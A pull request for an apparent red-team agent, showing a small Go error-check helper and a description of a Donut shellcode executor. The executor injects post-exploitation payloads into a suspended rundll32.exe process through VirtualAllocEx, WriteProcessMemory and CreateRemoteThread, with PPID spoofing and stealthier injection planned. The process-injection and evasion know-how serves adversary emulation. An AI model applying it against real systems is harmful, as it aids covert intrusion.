+func checkErrorMessage(err error) bool {
+	if err != nil && err.Error() != "The operation completed successfully." {
+		println(err.Error())
+		return true
+	}
+	return false
+}


### PR DESCRIPTION
This PR includes a Donut executor for sandcat. It is intended to function in co-operation with the stockpile and builder plugins to allow for executing post-exploitation payloads as Donut shellcode. With the builder plugin, it also enables ability authors to create abilities with C# source code. That code is dynamically built in to an exectutable, shellcode is generated for it, and then the shellcode is executed on-target.

The intial version of the Donut executor uses a very simple execution pattern of:
1) Create a new subprocess in a suspended state. For now, hardcoded rundll32.exe. In the future, this should use the Fact system or should be randomly selected. It should also be iterated upon to include PPID spoofing.
2) Redirect the stout and stderr of the new process to anonymous pipes.
3) Use the classic VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread injection pattern to inject Donut shellcode into the new sacrificial process as a new running thread. Ideally, this should be iterated on to use a stealthier injection pattern.
4) Once the shellcode finishes executing, terminate the sacrificial process and close all handles for it.

In order to prevent any third-party packages or cgo from being used within sandcat, I copied the minimum amount of code necessary from the official `windows` package to allow the Golang runtime to use arbitrary Win32/Nt APIs. The Donut executor leverages this to dynamically load and execute the Windows API calls necessary for this injection pattern.